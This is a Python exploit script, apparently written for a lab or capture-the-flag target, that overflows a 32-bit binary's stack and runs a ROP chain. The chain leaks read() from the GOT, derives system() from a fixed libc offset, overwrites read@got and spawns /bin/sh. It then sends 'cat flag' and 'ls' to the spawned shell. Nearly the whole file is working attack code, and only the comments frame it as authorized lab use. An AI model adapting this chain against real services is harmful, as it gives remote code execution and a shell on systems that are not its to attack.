from struct import *
from socket import *
from time import *
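# Target of this lab exploit. Every address below belongs to one specific
# 32-bit, non-PIE build of the target (fixed PLT/GOT/.dynamic addresses), and
# `offset` belongs to the libc that build loads; all of them must be recomputed
# for any other binary or distro. Use only against systems you are authorized
# to test.
HOST = "192.168.93.141"
PORT = 9909

p = lambda x: pack("<L", x)          # int -> 4-byte little-endian dword (x86-32)
up = lambda x: unpack("<L", x)[0]    # 4-byte little-endian dword -> int

dynamic = 0x08049530    # writable scratch area (presumably .dynamic, per its name) for "/bin/sh\n"
read_plt = 0x0804832c   # read@plt: reads our input; after the GOT overwrite it reaches system()
read_got = 0x0804961c   # read@got.plt: leaked to locate libc, then overwritten with system
write_plt = 0x0804830c  # write@plt: used for the leak
pppr = 0x080484b6       # pop;pop;pop;ret (per its name): discards the 3 args between calls
offset = 0x9abe0        # read - system inside the target's libc (libc-specific!)
binsh = b"/bin/sh"

# ROP chain, one call per line; each call is followed by pppr and its 3 args.
#   Stage 1: read(0, dynamic, 8)   -- stash "/bin/sh\n" (exactly 8 bytes) in memory
#   Stage 2: write(1, read_got, 4) -- leak read()'s resolved libc address
#   Stage 3: read(0, read_got, 4)  -- overwrite read@got with system's address
chain = [
    read_plt, pppr, 0, dynamic, 8,
    write_plt, pppr, 1, read_got, 4,
    read_plt, pppr, 0, read_got, 4,
]
# 140 bytes of filler reach the saved return address, which becomes the first
# gadget. Stage 4 calls read@plt(dynamic), which after stage 3 is
# system("/bin/sh\n"); "AAAA" is system's return address and never matters
# once the shell is running.
exploit = b"\x90" * 140
exploit += b"".join(p(word) for word in chain)
exploit += p(read_plt) + b"AAAA" + p(dynamic)


def recv_exact(sock, n):
    """Read exactly ``n`` bytes from ``sock``, looping over short reads.

    A single ``recv(4)`` may legitimately return fewer bytes; feeding a short
    leak to ``unpack("<L")`` fails with an unhelpful struct.error. Raises
    EOFError if the peer closes the connection before ``n`` bytes arrive.
    """
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise EOFError("connection closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf


def main():
    """Deliver the chain to HOST:PORT, resolve system() from the leak, and run commands."""
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(10)  # fail loudly instead of hanging forever if the leak never arrives
    sock.connect((HOST, PORT))
    try:
        print("Exploit Start")
        # sendall: plain send() may transmit only part of the payload.
        sock.sendall(exploit + b"\n")      # overflow + ROP chain
        sock.sendall(binsh + b"\n")        # consumed by stage 1 (8 bytes)
        sleep(1)
        leaked_read = up(recv_exact(sock, 4))   # stage 2 output
        system = leaked_read - offset
        sock.sendall(p(system))            # consumed by stage 3
        sock.sendall(b"cat flag\n")        # first command for the spawned shell
        sleep(1)
        print(sock.recv(1024).decode("utf-8", "replace"))
        sleep(1)
        sock.sendall(b"ls \n")
        print(sock.recv(4096).decode("utf-8", "replace"))
    finally:
        sock.close()


if __name__ == "__main__":
    main()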